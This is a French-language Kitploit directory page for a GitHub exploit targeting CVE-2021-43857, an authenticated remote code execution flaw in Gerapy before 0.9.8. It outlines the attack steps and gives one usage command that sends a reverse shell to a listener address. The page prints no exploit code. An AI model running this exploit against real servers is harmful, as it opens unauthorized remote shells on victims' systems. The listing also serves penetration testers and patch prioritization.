Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Outils/GitHubGitHub/longwayhomie/cve-2021-43857
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionOutil d'Accès à Distance
GitHublongwayhomie/cve-2021-43857

CVE-2021-43857

Gerapy avant la version 0.9.8 est vulnérable à l'exécution de code à distance. Ce problème est corrigé dans la version 0.9.8.

Voir le dépôt
71il y a 4 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2021-43857

Gerapy, dans les versions antérieures à 0.9.8, est vulnérable à l'exécution de code à distance. Ce problème est corrigé dans la version 0.9.8. CVE-2021-43857 est une vulnérabilité classée comme priorité Critique (CVSS 9.8) menant à l'exécution de code à distance.
Cette vulnérabilité affecte toutes les versions antérieures à 0.9.8.
Testée uniquement sur la version 0.9.6. Nécessite des identifiants valides.
L'exploit fonctionne en se connectant à l'application, puis en récupérant la liste des projets créés (il échouera s'il n'y en a aucun), puis en utilisant les paramètres du projet pour exécuter le mécanisme spider vulnérable en envoyant une charge utile de shell inversé.

Exemple d'utilisation : python3 cve-2021-43857.py -t 172.17.0.2 -p 8000 -L 172.17.0.1 -P 4444

Screen

Télécharger l’outil